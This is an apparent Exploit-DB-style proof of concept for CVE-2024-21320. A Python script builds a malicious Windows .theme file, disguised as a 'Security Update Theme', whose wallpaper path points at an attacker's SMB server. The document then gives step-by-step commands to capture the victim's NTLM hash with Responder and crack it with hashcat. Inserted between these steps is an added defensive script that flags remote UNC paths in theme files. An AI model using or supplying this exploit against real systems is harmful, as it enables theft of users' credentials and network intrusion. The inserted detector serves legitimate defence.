# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.
```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
```
Replace `eth0` with your network interface.
## Step 2: Create a Malicious Windows Theme File
### Python Script to Generate the Malicious `.theme` File
```python
import os

# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP

# Name of the malicious theme file
theme_filename = "malicious.theme"

# Malicious .theme file content
# (backslashes are doubled so the f-string emits single literal backslashes)
theme_content = f"""
[Theme]
DisplayName=Security Update Theme
[Control Panel\\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Write the theme file
with open(theme_filename, "w") as theme_file:
    theme_file.write(theme_content)
print(f"[+] Malicious theme file '{theme_filename}' created.")

# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower()
if start_http == "y":
    print("[+] Starting HTTP server on port 8080...")
    os.system("python3 -m http.server 8080")
```
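The leak depends on a theme value such as `Wallpaper` pointing at a remote host, so a `.theme` file can be triaged by flagging any value that resolves to a UNC or `file://` host. The following is an added example, not part of the original PoC; the function names, the regular expression and the sample theme (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import re
import sys

# Remote forms flagged: \\host\share, //host/share, \\?\UNC\host\share, file://host/share.
# Local device paths (\\?\C:\..., \\.\...) and file:///C:/... are not matched.
REMOTE = re.compile(
    r'^(?:file:)?(?:\\\\|//)(?:\?\\UNC\\)?(?P<host>[^\\/?.][^\\/]*)[\\/]',
    re.IGNORECASE,
)

# Constructed sample theme, used when no file is given on the command line.
SAMPLE = r"""
[Theme]
DisplayName=Example
[Control Panel\Desktop]
Wallpaper=\\192.0.2.10\share\picture.jpg
[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""

def read_theme(path):
    """Read a .theme file, honouring a UTF-16 byte-order mark if present."""
    with open(path, "rb") as fh:
        data = fh.read()
    enc = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
    return data.decode(enc, errors="replace")

def find_remote_refs(theme_text):
    """Return (section, key, host) for each value that points at a remote host."""
    hits, section = [], ""
    for raw in theme_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        match = REMOTE.match(value.strip().strip('"')) if sep else None
        if match:
            hits.append((section, key.strip(), match.group("host")))
    return hits

if __name__ == "__main__":
    texts = [(p, read_theme(p)) for p in sys.argv[1:]] or [("SAMPLE", SAMPLE)]
    for name, text in texts:
        for section, key, host in find_remote_refs(text):
            print(f"{name}: [{section}] {key} -> remote host {host}")
```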
## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:
   ```bash
   sudo python3 Responder.py -I eth0
   ```
3. Wait for the victim to open the `.theme` file.
4. Extract NTLM hash from Responder logs and crack it using hashcat:
   ```bash
   hashcat -m 5600 captured_hashes.txt rockyou.txt
   ```
--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University